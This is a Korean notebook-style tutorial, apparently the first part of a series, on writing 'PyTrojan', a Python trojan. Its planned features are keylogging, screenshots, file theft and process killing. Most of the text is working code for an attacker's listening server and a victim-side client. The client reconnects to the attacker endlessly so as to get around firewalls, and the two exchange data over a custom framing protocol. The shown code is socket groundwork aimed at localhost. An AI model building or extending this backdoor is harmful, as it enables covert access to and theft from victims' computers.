# 트로이목마(Trojan)

트로이목마(Trojan Horse) 프로그램은 악성코드 종류중에 가장 많이 사용되는 방식의 프로그램이며 실제 시스템의 정보를 탈취하거나 하는 백도어 형태의 특수한 목적의 프로그램을 정상적인 프로그램으로 위장한 프로그램을 일컫는 말 입니다. 우리가 흔히 알고 있는 좀비PC 역시 이런 트로이목마 프로그램의 한 종류라고도 볼 수 있습니다.

트로이목마 혹은 백도어 프로그램은 악의적인 목적을 띄지 않는다면 일반적인 서버 / 클라이언트 네트워크 프로그램이랑 다를바가 없습니다. 그렇기 때문에 알려지지 않은 트로이목마라면 백신은 정상적인 프로그램으로 판단할 수 밖에 없습니다.


## PyTrojan 기능

보통 예전에는 감염되는 대상이 서버가 되고 공격자가 원격지에서 서버로 접속하는 방식을 많이 사용했습니다. 이런경우에는 몇가지 문제점이 있는데 일단 감염대상이 되는 서버의 아이피 주소를 알아야 하고 만약 서버가 공유기나 방화벽 환경에서 구동중이라면 이를 우회하기엔 여러가지 기술이 더 필요합니다. 그래서 이를 반대로 공격자의 컴퓨터에서 서버를 구동시키고 감염되는 대상이 공격자의 컴퓨터로 접속하는 방식을 사용해보도록 하겠습니다.


### PyTrojan 의 구현 기능
- 감염된 컴퓨터의 키보드 입력을 감지하는 키로깅 기능
- 감염된 컴퓨터의 화면을 스크린샷하여 전송하는 기능
- 감염된 컴퓨터의 파일목록을 브라우징 하고 다운로드 할 수 있는 기능
- 감염된 컴퓨터의 프로세스 목록을 보거나 강제 종료할 수 있는 기능
- 공격자 서버 프로그램은 GUI 프로그램으로 제작


### 서버 프로그램 기본(공격자)

In [ ]:
import socket
import threading

# 클라이언트의 접속을 대기할 서버 소켓
server_socket = None
# 클라이언트와 접속이 성공되면 연결될 통신 소켓
conn_socket = None
# 서버 구동 포트
PORT = 5988


def get_message(conn, addr):
    '''클라이언트에서 전송되는 데이터를 받는 함수
       이 함수는 쓰레드로 동작하며 서버에서 내린 명령의 결과를 이 함수가 다 받게 됩니다.'''
    # 버퍼 사이즈는 TCP 아이피가 한번에 수신할 수 있는 크기는 정해져있으며
    # 이 값은 운영체제의 환경, 네트워크 환경마다 다르며 유동적입니다.
    BUFF_SIZE = 1024
    data = bytearray()
    while True:
        # 클라이언트로부터 BUFF_SIZE 만큼의 데이터를 수신합니다.
        packet = conn.recv(BUFF_SIZE)
        # packet 이 Not 인 경우는 클라이언트가 접속을 종료했거나 연결이 끊긴 경우 발생합니다.
        if not packet:
            break
        # 클라이언트로 부터 전송된 데이터를 bytearray 형 변수에 추가합니다.
        data.extend(packet)
    # while 문을 탈출한 경우는 클라이언트와의 접속이 끊긴경우로 판단하여
    # 현재 접속된 소켓을 닫고 다시 클라이언트의 요청을 대기 하기 위해 create_socket 함수를 호출합니다.
    conn.close()
    create_socket()


def create_socket():
    '''서버가 클라이언트의 접속을 대기하는 함수'''
    global server_socket, conn_socket

    # 서버 소켓이 None 이 아니면 기존의 소켓을 삭제 합니다.
    if server_socket is not None:
        del server_socket

    # TCP(SOCK_STREAM) 소켓을 생성하여 server_socket 변수에 저장 합니다.
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # 서버는 PORT 를 사용하여 동작합니다.
    server_socket.bind(("", PORT))
    # server_socket 은 접속을 대기(listen)하는 역할을 합니다.
    server_socket.listen(1)

    # 클라이언트에게서 접속 요청이 오면 accept() 가 발생되는데
    # 이때 accept 함수는 클라이언트와 연결된 새로운 소켓(conn_socket)과 클라이언트의 주소(addr)을 리턴 합니다.
    # 클라이언트와의 실제 통신은 이렇게 리턴된(conn_socket) 과 하게 됩니다.
    # !!!! server_socket 은 접속 대기용으로만 사용!!!
    conn_socket, addr = server_socket.accept()

    print("*" * 10 + " connected " + "*" * 10)
    # 성공적으로 클라이언트와 접속이 완료되면 클라이언트에게서 데이터를 수신해야 하는데
    # 메시지 수신 함수는 무한루프로 동작하기 때문에 반드시 쓰레드로 분리해야 합니다.
    th_g = threading.Thread(target=get_message, args=(conn_socket, addr), daemon=False)
    th_g.start()


if __name__ == "__main__":
    create_socket()

위의 코드는 소켓을 생성하여 감염된 컴퓨터로 부터의 접속을 대기하는 기능을 구현한 공격자용 프로그램의 기본 코드 입니다. 여기서 주의해야할 부분은 ```daemon=False``` 이 부분인데 차후 GUI 형태로 프로그램이 수정될때는 ```daemon=True``` 로 변경될 예정인 부분입니다. 

### 클라이언트 프로그램 (감염자)

In [ ]:
import socket
import threading

# 서버(공격자)의 아이피 주소
REMOTE_IP = "localhost"
# 서버로 접속할 포트
REMOTE_PORT = 5988
# 메세지 받을 버퍼 사이즈
PACKET_SIZE = 1024

# 서버 접속용 소켓 변수
sock = None
# 서버와의 접속 여부를 판별하여 메세지를 받을지 말지 결정하는 변수
recv_thread = False


def connect_socket():
    '''서버에 접속하는 함수'''
    global sock

    # 기존의 소켓이 생성되어있으면 close 후 삭제
    if sock:
        sock.close()
        del sock

    # 여기서 try except 문을 반드시 써야하는 이유는
    # 클라이언트는 서버가 언제 구동될지 모르기 때문에
    # 만약 서버(공격자)가 구동되어 있지 않아 접속이 안될경우 오류가 발생됩니다.
    try:
        # TCP 소켓 생성
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # 서버로 접속 시도(접속되지 않으면 try except 문에 의해 False 를 리턴)
        sock.connect((REMOTE_IP, REMOTE_PORT))
    except Exception as e:
        print("Error {}".format(e))
        return False
    # 서버와 접속 성공시 True 리턴
    return True


def get_message():
    '''서버의 메세지를 수신하는 함수
    여기서 서버의 공격명령을 받아 해당 명령에 맞는 동작을 구현하게 됩니다.'''
    global recv_thread, sock

    # 서버로의 메시지를 수신하기 위해 무한 루프로 동작합니다.
    while recv_thread:
        # 서버와의 접속이 끊겼을때 오류를 방지하기 위해 try exception 문으로 구현 합니다.
        try:
            # 서버에서 PACKET_SIZE 만큼의 byte 데이터를 수신하여
            # utf-8 로 decode 하여 문자열 형태로 변환 (byte => str) 합니다.
            recv_data = sock.recv(PACKET_SIZE).decode('utf-8')
            print("데이터 받음: {}".format(recv_data))
        except Exception as e:
            print("Exit get message {}".format(e))
            recv_thread = False
            break


if __name__ == "__main__":
    # 클라이언트(감염된 컴퓨터)는 접속이 끊기더라도
    # 계속 서버로의 접속을 시도하고 동작을 유지하기 위해
    # 기본적으로 무한 루프로 구현합니닫.
    while True:
        connect_socket()
        recv_thread = True
        th_g = threading.Thread(target=get_message, daemon=True)
        th_g.start()
        th_g.join()

위의 코드는 소켓을 생성한 후 공격자 컴퓨터로의 접속을 무한정 시도하는 감염자가 실행해야할 기본 코드 입니다. 공격자와의 네트워크 접속이 끊어지더라도 감염된 컴퓨터는 다시 소켓을 생성하고 접속을 무한정 시도해야 합니다.

### 클라이언트 데이터 송신 기능 테스트(감염자)

In [ ]:
def connect_socket():
    '''서버에 접속하는 함수'''
    global sock

    # 기존의 소켓이 생성되어있으면 close 후 삭제
    if sock:
        sock.close()
        del sock

    # 여기서 try except 문을 반드시 써야하는 이유는
    # 클라이언트는 서버가 언제 구동될지 모르기 때문에
    # 만약 서버(공격자)가 구동되어 있지 않아 접속이 안될경우 오류가 발생됩니다.
    try:
        # TCP 소켓 생성
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # 서버로 접속 시도(접속되지 않으면 try except 문에 의해 False 를 리턴)
        sock.connect((REMOTE_IP, REMOTE_PORT))

        while True:
            data = input("SEND > ")
            sock.send(data.encode())

    except Exception as e:
        print("Error {}".format(e))
        return False
    # 서버와 접속 성공시 True 리턴
    return True


위에서 작성한 클라이언트 프로그램의 ```connect_socket``` 함수에 sock.connect 후 공격자의 컴퓨터에 접속을 하게 되면 ```while``` 문을 통해 사용자에게 입력받은 내용을 공격자에게 전송하는 기능을 추가하여 데이터를 송신 하는 기능을 테스트 해보도록 하겠습니다.

![데이터송수신](images/2.jpg)

위의 이미지에서 처럼 짧은 문자열 데이터를 입력해보면 아무 문제 없이 송수신이 잘 되는것을 확인 할 수 있습니다.

![데이터송수신](images/4.jpg)

그런에 위의 이미지에서 처럼 데이터의 양이 많아지면 보내는 측에서는 한번 ```send()``` 함수를 통해 데이터를 송신 했다고 해도 받는 측에선 여러번 ```recv()``` 함수가 호출 된다는 사실을 알 수 있습니다. 

### 데이터 송수신의 문제
소켓 통신시에 데이터를 전송할때 ```send()``` 함수와 ```recv()``` 함수를 통해 데이터를 송수신 할 수 있습니다. 일반적으로 ```send()``` 함수로 10 바이트의 데이터를 전송했다면 받는 쪽에서 ```recv()```를 했을때 10바이트를 온전히 받습니다. 그런데 여기서 ```send()``` 함수를 통해 보낸 데이터의 크기가 일정량 이상이 되는경우 보낸이는 ```send()``` 함수를 통해 1번 전송했지만 받는 쪽에서는 1번의 ```recv()``` 함수로 받을 수가 없는 경우가 생깁니다. 이는 내부적으로 소켓 버퍼의 상태에 따라 결정되므로 우리가 이를 수정할 수가 없습니다. 그렇기 때문에 한번에 보내는 데이터의 양이 많아질 수 있는 환경에서는 이를 고려하여 데이터를 송수신 할 수 있는 방식으로 프로그램을 제작해야 합니다. 이 부분이 문제가 되는 이유는 예를 들어 A 함수에 의해 보내진 결과와 B 함수에 의해 보내진 결과를 받는 측에서 알 수가 없기 때문입니다. 그 말은 현재 수신한 데이터가 어떤 데이터인지를 알 수 없는 얘기와도 같습니다.

### 클라이언트 데이터 약속 송신 (send)

In [ ]:
# 데이터의 구간을 나누기 위한 구분자
PARSE = ":::"
# 데이터의 끝을 의미하는 표기
EOF = "##EOF##"

def send_socket(header, msg):
    buffer = bytearray()
    buffer.extend(header.encode())
    buffer.extend(PARSE.encode())

    if type(msg) == bytes:
        buffer.extend(msg)
    else:
        buffer.extend(msg.encode())

    buffer.extend(PARSE.encode())
    buffer.extend(EOF.encode())
    sock.send(buffer)

클라이언트(감염자) 프로그램에 약속된 형태로 데이터를 송신하기 위한 ```send_socket``` 함수를 만들도록 합니다. 위의 함수의 인자값을 보면 ```header, msg``` 2가지의 인자를 받습니다. 기본적으로 소켓을 통한 데이터 송수신은 모두 byte 형태의 자료형으로 전송을 하게 됩니다. 데이터의 송수신 약속을 정하는건 개발자가 임의로 설정하게 되는 부분입니다. 일반적인 프로토콜의 형태를 흉내내 보도록 하겠습니다.

<table>
    <tr>
        <td>헤더(데이터의종류)</td>
        <td>:::(구분자)</td>
        <td>실제데이터</td>
        <td>:::(구분자)</td>
        <td>데이터끝표기</td>
    </tr>
</table>

여기서 작성된 내용은 모두 임의의 내용으로 헤더는 현재 보내는 데이터가 어떤 종류의 데이터인지를 기록합니다. 예를 들어 접속 성공에 대한 내용이다 그러면 헤더값을 "CON", 차후에 작성할 키보드 입력값을 전송중이다 그러면 "KEY" 등, 이런식으로 임의로 정할 예정입니다. 그리고 수신 측에서 데이터 문자열 파싱을 용이하게 하기 위해서 구분자를 두었습니다. 구분자는 일반적으로 사용되지 않을 문자를 입력해야 오류를 방지할 수 있습니다. 그리고 데이터 맨 마지막에 EOF 의미로 **데이터의 끝**이라는 표기를 해주었습니다. 그렇게 되면 수신측에서는 루프를 돌며 ```recv()``` 할 수 있고 **데이터의 끝** 이 나오면 그곳까지가 하나의 데이터라고 간주 할 수 있게 됩니다. EOF 라는건 End Of File 의 약자로 실제 파일의 끝을 표기하는 의미로 사용되는데 실제 값은 -1, NULL, nil 등의 값을 사용하기도 합니다.

### 서버 데이터 약속 수신 (recv)

In [ ]:
# 데이터의 구간을 나누기 위한 구분자
PARSE = ":::"
# 데이터의 끝을 의미하는 표기
EOF = "##EOF##"

def get_message(conn, addr):
    BUFF_SIZE = 1024
    data = bytearray()
    while True:
        packet = conn.recv(BUFF_SIZE)
        if not packet:
            break
        data.extend(packet)
        if EOF.encode() in data:
            try:
                list_data = data.split(PARSE.encode())
                data.clear()
                data_type = list_data[0]
                buffer = list_data[1]
            except Exception as e:
                print(e)

이제 데이터를 수신하는 측에서는 보내는 약속에 맞게 데이터를 파싱하여야 합니다. 기본적인 ```while``` 문을 통한 루프를 돌며 ```recv()```를 하다가 ```recv()``` 한 데이터에 약속된 데이터 끝 표기인 ***EOF*** 가 있는지를 확인하여 있으면 하나의 데이터로 간주하고 해당 데이터를 구분자로 ```split()``` 함수를 통해 잘라내기 하여 배열화 시킵니다. 그러면 아무리 양이 많은 데이터를 한번에 전송했다 하더라도 전송받은 데이터는 데이터종류, 데이터 로 구분하여 사용할 수 있게 됩니다.

![데이터송수신](images/5.jpg)


## 프로토콜
위에서 데이터 송수신에 대한 약속을 정의하는것을 쉽게 프로토콜이라고 이해할 수 있습니다. 위의 코드는 쉬운 이해를 돕기 위해 최대한 쉬운 코드로 작성을 한 것이기 때문에 모두 평문으로 전송했고 그렇기 때문에 전송되는 데이터가 모두 노출되는 취약점이 있습니다. 그리고 구분자 같은 데이터는 사실 불필요한 데이터 입니다. 실제 프로토콜을 설계할 때는 정해진 바이트에는 헤더정보, 정해진 바이트만큼 사이즈 정보 같이 데이터의 구조 자체를 서로 약속하게 되며 데이터의 크기에 대한 최적화, 데이터 보안에 대해서도 고려해야 합니다. 

### 데이터 송수신 약속을 정의한 테스트 최종 코드
#### 클라이언트

In [ ]:
import socket
import threading

# 서버(공격자)의 아이피 주소
REMOTE_IP = "localhost"
# 서버로 접속할 포트
REMOTE_PORT = 5988
# 메세지 받을 버퍼 사이즈
PACKET_SIZE = 1024

# 서버 접속용 소켓 변수
sock = None
# 서버와의 접속 여부를 판별하여 메세지를 받을지 말지 결정하는 변수
recv_thread = False

# 데이터의 구간을 나누기 위한 구분자
PARSE = ":::"
# 데이터의 끝을 의미하는 표기
EOF = "##EOF##"


def send_socket(header, msg):
    buffer = bytearray()
    buffer.extend(header.encode())
    buffer.extend(PARSE.encode())

    if type(msg) == bytes:
        buffer.extend(msg)
    else:
        buffer.extend(msg.encode())

    buffer.extend(PARSE.encode())
    buffer.extend(EOF.encode())
    sock.send(buffer)


def connect_socket():
    '''서버에 접속하는 함수'''
    global sock

    # 기존의 소켓이 생성되어있으면 close 후 삭제
    if sock:
        sock.close()
        del sock

    # 여기서 try except 문을 반드시 써야하는 이유는
    # 클라이언트는 서버가 언제 구동될지 모르기 때문에
    # 만약 서버(공격자)가 구동되어 있지 않아 접속이 안될경우 오류가 발생됩니다.
    try:
        # TCP 소켓 생성
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # 서버로 접속 시도(접속되지 않으면 try except 문에 의해 False 를 리턴)
        sock.connect((REMOTE_IP, REMOTE_PORT))

        # 데이터 송수신을 테스트 하기 위한 코드이며
        # 다음 단게에서 삭제 될 부분 입니다.
        while True:
            data = input("SEND > ")
            send_socket("TES", data.encode())

    except Exception as e:
        print("Error {}".format(e))
        return False
    # 서버와 접속 성공시 True 리턴
    return True


def get_message():
    '''서버의 메세지를 수신하는 함수
    여기서 서버의 공격명령을 받아 해당 명령에 맞는 동작을 구현하게 됩니다.'''
    global recv_thread, sock

    # 서버로의 메시지를 수신하기 위해 무한 루프로 동작합니다.
    while recv_thread:
        # 서버와의 접속이 끊겼을때 오류를 방지하기 위해 try exception 문으로 구현 합니다.
        try:
            # 서버에서 PACKET_SIZE 만큼의 byte 데이터를 수신하여
            # utf-8 로 decode 하여 문자열 형태로 변환 (byte => str) 합니다.
            recv_data = sock.recv(PACKET_SIZE).decode('utf-8')
            print("데이터 받음: {}".format(recv_data))
        except Exception as e:
            print("Exit get message {}".format(e))
            recv_thread = False
            break


if __name__ == "__main__":
    # 클라이언트(감염된 컴퓨터)는 접속이 끊기더라도
    # 계속 서버로의 접속을 시도하고 동작을 유지하기 위해
    # 기본적으로 무한 루프로 구현합니닫.
    while True:
        connect_socket()
        recv_thread = True
        th_g = threading.Thread(target=get_message, daemon=True)
        th_g.start()
        th_g.join()

#### 서버

In [ ]:
import socket
import threading

# 클라이언트의 접속을 대기할 서버 소켓
server_socket = None
# 클라이언트와 접속이 성공되면 연결될 통신 소켓
conn_socket = None
# 서버 구동 포트
PORT = 5988

# 데이터의 구간을 나누기 위한 구분자
PARSE = ":::"
# 데이터의 끝을 의미하는 표기
EOF = "##EOF##"


def get_message(conn, addr):
    '''클라이언트에서 전송되는 데이터를 받는 함수
       이 함수는 쓰레드로 동작하며 서버에서 내린 명령의 결과를 이 함수가 다 받게 됩니다.'''
    # 버퍼 사이즈는 TCP 아이피가 한번에 수신할 수 있는 크기는 정해져있으며
    # 이 값은 운영체제의 환경, 네트워크 환경마다 다르며 유동적입니다.
    BUFF_SIZE = 1024
    data = bytearray()
    while True:
        # 클라이언트로부터 BUFF_SIZE 만큼의 데이터를 수신합니다.
        packet = conn.recv(BUFF_SIZE)
        # print("데이터 받음: {}".format(packet.decode()))
        # packet 이 Not 인 경우는 클라이언트가 접속을 종료했거나 연결이 끊긴 경우 발생합니다.
        if not packet:
            print("**** DISCONNECT ****")
            break
        # 클라이언트로 부터 전송된 데이터를 bytearray 형 변수에 추가합니다.
        data.extend(packet)
        if EOF.encode() in data:
            try:
                list_data = data.split(PARSE.encode())
                data.clear()
                data_type = list_data[0]
                buffer = list_data[1]
                print("타입: {} 데이터: {}".format(data_type, buffer))
            except Exception as e:
                print(e)
    # while 문을 탈출한 경우는 클라이언트와의 접속이 끊긴경우로 판단하여
    # 현재 접속된 소켓을 닫고 다시 클라이언트의 요청을 대기 하기 위해 create_socket 함수를 호출합니다.
    conn.close()
    create_socket()


def create_socket():
    '''서버가 클라이언트의 접속을 대기하는 함수'''
    global server_socket, conn_socket

    # 서버 소켓이 None 이 아니면 기존의 소켓을 삭제 합니다.
    if server_socket is not None:
        del server_socket

    # TCP(SOCK_STREAM) 소켓을 생성하여 server_socket 변수에 저장 합니다.
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # 서버는 PORT 를 사용하여 동작합니다.
    server_socket.bind(("", PORT))
    # server_socket 은 접속을 대기(listen)하는 역할을 합니다.
    server_socket.listen(1)

    # 클라이언트에게서 접속 요청이 오면 accept() 가 발생되는데
    # 이때 accept 함수는 클라이언트와 연결된 새로운 소켓(conn_socket)과 클라이언트의 주소(addr)을 리턴 합니다.
    # 클라이언트와의 실제 통신은 이렇게 리턴된(conn_socket) 과 하게 됩니다.
    # !!!! server_socket 은 접속 대기용으로만 사용!!!
    conn_socket, addr = server_socket.accept()

    print("*" * 10 + " connected " + "*" * 10)
    # 성공적으로 클라이언트와 접속이 완료되면 클라이언트에게서 데이터를 수신해야 하는데
    # 메시지 수신 함수는 무한루프로 동작하기 때문에 반드시 쓰레드로 분리해야 합니다.
    th_g = threading.Thread(target=get_message, args=(conn_socket, addr), daemon=False)
    th_g.start()


if __name__ == "__main__":
    create_socket()